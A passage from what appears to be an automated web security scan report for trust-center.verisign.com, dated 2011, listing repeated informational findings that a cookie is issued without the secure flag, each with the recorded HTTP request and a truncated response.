GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46...[SNIP]...
6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0....[SNIP]...
6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;
6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ ..................C....... .. .......................................................'......................................[SNIP]...
6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ .....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG...[SNIP]...
6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f....[SNIP]...
6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
